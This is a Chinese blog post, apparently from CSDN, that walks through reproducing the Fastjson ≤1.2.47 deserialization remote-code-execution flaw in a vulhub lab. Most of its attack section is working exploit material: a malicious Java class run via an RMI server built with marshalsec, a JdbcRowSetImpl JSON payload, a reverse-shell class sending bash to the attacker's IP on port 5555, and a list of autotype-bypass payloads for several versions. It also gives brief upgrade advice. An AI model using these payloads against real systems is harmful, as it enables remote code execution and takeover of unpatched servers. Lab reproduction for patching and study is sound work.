rmi远程反序列化rce漏洞_fastjson 反序列化远程代码执行漏洞复现

最新推荐文章于 2022-08-25 14:52:35 发布
最新推荐文章于 2022-08-25 14:52:35 发布
阅读量115 收藏 1
点赞数
文章标签: rmi远程反序列化rce漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39599454/article/details/111917494
版权

漏洞概述:

fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。

首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson 1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过。

影响版本:

Fastjson 1.2.48之前版本。

漏洞环境:

vuhub(fastjson)

三台主机。我这里用的是两台主机

主机A:Fastjson环境(1.2.47)

主机B,C:RMI服务和恶意java类(win10)这里可以分为两台主机。

主机A搭建:

fastjson环境

主机B(win10)准备:

恶意java:

// javac TouchFile.java

import java.lang.Runtime;

import java.lang.Process;

public class TouchFile {

static {

try {

Runtime rt = Runtime.getRuntime();

String[] commands = {"touch", "/tmp/success"};

Process pc = rt.exec(commands);

pc.waitFor();

} catch (Exception e) {

// do nothing

}

}

}

将上面代码保存为***.Java,然后放到web服务根目录,最后编译成class文件。

javac  TouchFile.java

搭建web服务可以百度,windows10是在程序和功能添加即可。

web服务

主机C还是win10):

这里需要借助marshalsec项目,启动一个RMI服务器,监听9999端口,并加载远程类

因为这里给的直接是项目,所以需要自己打包下:

打包可以用mvn打包,所以需要先安装mvn

使用mvn clean package命令即可打包

开启RMI服务:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://web服务得那个ip/#TouchFile" 9999

注意编写格式就可以了#TouchFile,有个#,然后.class不用加。

漏洞复现:

直接访问fastjson,利用burp抓包

这里改成POST请求:然后加上payload:

poc:

{

"a":{

"@type":"java.lang.Class",

"val":"com.sun.rowset.JdbcRowSetImpl"

},

"b":{

"@type":"com.sun.rowset.JdbcRowSetImpl",

"dataSourceName":"rmi://监听服务器的ip:9999/TouchFile",

"autoCommit":true

}

}

验证是否执行命令:

进入fastjson:

查看/tmp目录下是否成功生成success文件,有则表示生成成功

复现升级:

既然可以创建目录,那么也可以反弹shell。这里反弹shell,我用的kali主机。

步骤和前面一样,换一个反弹shell的class,修改下代码:

// javac shell.java

import java.lang.Runtime;

import java.lang.Process;

public class shell {

static {

try {

Runtime rt = Runtime.getRuntime();

String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/反弹shellip/5555 0>&1"};

Process pc = rt.exec(commands);

pc.waitFor();

} catch (Exception e) {

// do nothing

}

}

}

漏洞修复:

0x04 修复建议

1.fastjson 的最新版本为 1.2.58 下载地址

建议广大用户对自身的业务/产品进行组件自查,确认 fastjson 版本至少升级到 1.2.58。

同时确认自身服务的 Java 环境版本,低于 8u121 7u13 6u141 的用户也请及时升级环境版本,以防受到其他严重漏洞影响。

绕过版本poc:

1.2.24

{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit", "autoCommit":true}}

未知版本(1.2.24-41之间)

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}

1.2.41

{"@type":"Lcom.sun.rowset.RowSetImpl;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}

1.2.42

{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true};

1.2.43

{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true]}

1.2.45

{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://localhost:1099/Exploit"}}

1.2.47

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}}

参考链接:

weixin_39599454
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
javaRMI反序列化漏洞验证工具
08-21
检测javaRMI反序列化漏洞
java反序列化漏洞利用工具_Apache Dubbo Provider默认反序列化远程代码执行漏洞
weixin_39597636的博客
11-30 349
背景近日,Apache Dubbo披露了Provider默认反序列化远程代码执行漏洞(CVE-2020-1948),攻击者可构造恶意请求,从而执行任意代码。具体信息如上图所示。在官方邮件中,漏洞报告者还提供了官方的PoC脚本,感兴趣的读者可以自行抓包和学习。本文旨在复现漏洞,找出漏洞利用条件,提出漏洞修复方案。dubbo基础知识简 介是一款高性能、轻量级的开源Jav...
fastjson jar包_Fastjson<=1.2.47反序列化RCE漏洞(CNVD201922238)
weixin_39677104的博客
11-28 167
Fastjson <=1.2.47反序列化RCE漏洞(CNVD‐2019‐22238)一、漏洞描述Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列 化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@typ...
rmi反序列化导致rce漏洞修复_Spring框架的反序列化远程代码执行漏洞分析
weixin_33978722的博客
12-23 247
Spring框架的反序列化远程代码执行漏洞分析星期三, 一月 27, 20160漏洞介绍国外的研究人员zero thoughts发现了一个Spring框架的反序列化远程代码执行漏洞。spring-tx.jar包中的org.springframework.transaction.jta.JtaTransactionManager类存在JNDI反序列化问题。只要创建一个JtaTransactionMa...
rmi远程反序列化rce漏洞_Weblogic wls9-async反序列化远程代码执行漏洞(CVE-2019-2725)漏洞分析...
weixin_30390951的博客
02-22 282
阅读:1,361这个漏洞最先由某厂商报给某银行,某银行再将该信息报给CNVD,后CNVD通告:国家信息安全漏洞共享平台(CNVD)收录了由该银行报送的Oracle WebLogic wls9-async反序列化远程命令执行漏洞(CNVD-C-2019-48814),详情见链接:cnvd对于该漏洞,Oracle官方也破例了一回,提前发了补丁,但是这个补丁只是针对10.3.6系列的,对于12版本系列...
rmi反序列化导致rce漏洞修复_RMI反序列化漏洞分析
weixin_39710249的博客
12-23 459
RMI简介首先看一下RMI在wikipedia上的描述:Java远程方法调用,即JavaRMI(JavaRemote MethodInvocation)是Java编程语言里,一种用于实现远程过程调用的应用程序编程接口。它使客户机上运行的程序可以调用远程服务器上的对象。远程方法调用特性使Java编程人员能够在网络环境中分布操作。RMI全部的宗旨就是尽可能简化远程接口对象的使用。JavaRMI极大地依...
Fastjson反序列化审计及验证
liguangyao213的博客
04-02 1599
java代码审计系统课程--代码审计视频教程-信息安全-CSDN程序员研修院少写“漏洞” 了解常见代码安全 提升代码安全能力 代码不被黑客黑-https://edu.csdn.net/course/detail/32634 Fastjson反序列化 代码审计 本项目引入的Fastjson版本为1.2.58,该版本存在反序列化漏洞。 已确定了Fastjson版本存在问题,进一步寻找触发Fastjson漏洞点。 我们关注两个函数JSON.parse()和JSON.parseObject(),并且执.
Fastjson小于1.2.67 UnSerializable RCE分析研究
Fly_鹏程万里
05-08 2374
开篇前言 从2018年2月的第一篇文章开始到现在已经发布了946篇原创文章,时隔2年零2个月,博客粉丝达到了3000人,很是感谢大家的支持以及对笔者博客的喜爱,后续笔者也将用心撰写更加有质量的博客与广大IT领域的人员进行深度交流,为了答谢广大的粉丝,本次奉上一篇最近写的Fastjson反序列化漏洞文章,以此作为致谢~ 影响范围 Fastjson<=1.2.66 漏洞类型 反序列化导...
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6301
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
Java反序列化漏洞总结【fastjson为例】
z69183787的专栏
01-06 1446
前言 前段时间FastJson被曝高危漏洞,其实之前也被报过类似的漏洞,只是项目中没有使用,所以一直也没怎么关注;这一次刚好有项目用到FastJson,打算对其做一个分析。 漏洞背景 2020年05月28日, 360CERT监测发现业内安全厂商发布了[Fastjson远程代码执行漏洞](https://cert.360.cn/warning/detail?id=af8fea5f165df6198033de208983e2ad)的风险通告,漏洞等级:高危。Fastjson是阿里巴巴的开源JSON解析库,
fastjson1.2.47RCE远程命令执行漏洞复现
zyl404的博客
01-06 1807
fastjson1.2.47RCE远程命令执行漏洞分析 漏洞背景 在2019年6月,fastjson 被爆出在 fastjson< =1.2.47 的版本中,攻击者可以利用特殊构造的 json 字符串绕过白名单检测,成功执行任意命令。 漏洞分析 此漏洞利用的核心点是java.lang.class这个java的基础类,在fastjson 1.2.48以前的版本没有做该类做任何限制,加上代码的一些逻辑缺陷,造成黑名单以及autotype绕过。 过程: 1.Fastjson在开始解析json (JS 对象
fastjson反序列化分析
hongduilanjun的博客
03-16 2585
1.fastjson简单使用 User: package com.naihe; public class User { private String name; private int age; public User() {} public User(String name, int age) { this.name = name; this.age = age; } public String getName
热门Fastjson 中出现高危RCE漏洞
smellycat000的专栏
06-17 1272
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士网络安全研究员详述了最近修复的位于热门 Fastjson 库中的一个高危漏洞(CVE-2022-25845),它可被用于执行远程代码。该漏洞和受支持的特性 “AutoType” 中的不受信任的反序列化有关。项目维护人员已于2022年5月23日在版本1.2.83中将其修复。JFrog 公司的研究员 Uriya Yavnie...
利用1099服务漏洞————java_rmi_server
weixin_43196087的博客
10-22 3904
本文章是小白up主的自我笔记,希望对正在 学习的你有所帮助 在BT5上利用漏洞机端口1099服务漏洞进行攻击查看根目录下的文件 今天我们来利用1099的服务漏洞来进行攻击 首先我么要用到的虚拟机有: BT5,和linux的漏洞机 其实一般这些利用模块的攻击模块都是在msfconsole模式下进行的,他们的流程都是差不多的 我们先进行1099的端口服务的扫描,看一下1099具体的服务名称 nma...
fastjson远程代码执行漏洞
网安君的博客
03-29 5414
Fastjson 1.2.24 远程代码执行漏洞 漏洞说明 FastJson库是Java的一个Json库,其作用是将Java对象转换成json数据来表示,也可以将json数据转换成Java对象。在2017年3月15日,fastjson官方主动爆出fastjson在1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。 前提条件 开启autotype 影响范围 fastjson 1.2.22-1.2.24 jdk 1.7,1.8版本 漏洞复现 由于Fastj
Failed to start jmx connector: Cannot bind to URL[rmi://localhost:1099/jmxrmi]
随笔记录-分享&记忆
09-16 1万+
INFO  ActiveMQ JMS Message Broker (localhost, ID:cnshawlt1129-1495-1316140863881-0:0) started INFO  Connector vm://localhost Started  WARN
JAVA RMI 反序列化远程命令执行漏洞
热门推荐
LeeHDsniper的博客
05-11 2万+
JAVA RMI 反序列化远程命令执行漏洞 漏洞资料 背景 原理 Payload构造 搭建本地测试环境 开启包含第三方库的RMI服务 测试RMI客户端 攻击测试 升级版攻击 Weblogic Commons-Collections反序列化RCE漏洞CVE-2015-4852JAVA RMI 反序列化远程命令执行漏洞漏洞资料Java RMI远程反序列化任意类及远程代码执行解析(CVE-2017-324
Log4j2远程命令执行复现
yzl_007的博客
12-12 3903
Log4j2远程命令执行复现 Log4j2远程命令执行复现一、漏洞环境二、漏洞验证三、反弹shell 一、漏洞环境 环境是http://vulfocus.fofa.so平台的 二、漏洞验证 启动环境后访问 抓包,修改请求为post 在数据中的Accept:头插入exp ${jndi:ldap://8hqrxz.dnslog.cn} 成功回显到dnslog平台 三、反弹shell 使用 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 生成payload 可以在这里
rmi远程反序列化rce漏洞_Spring框架的反序列化远程代码执行漏洞分析(转)
最新发布
06-06
RMI远程反序列化RCE漏洞是指,攻击者可以通过构造恶意的序列化数据,使得服务端在反序列化执行恶意代码,从而导致远程代码执行漏洞。这个漏洞的根本原因在于Java序列化机制的设计缺陷,攻击者可以通过构造恶意的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值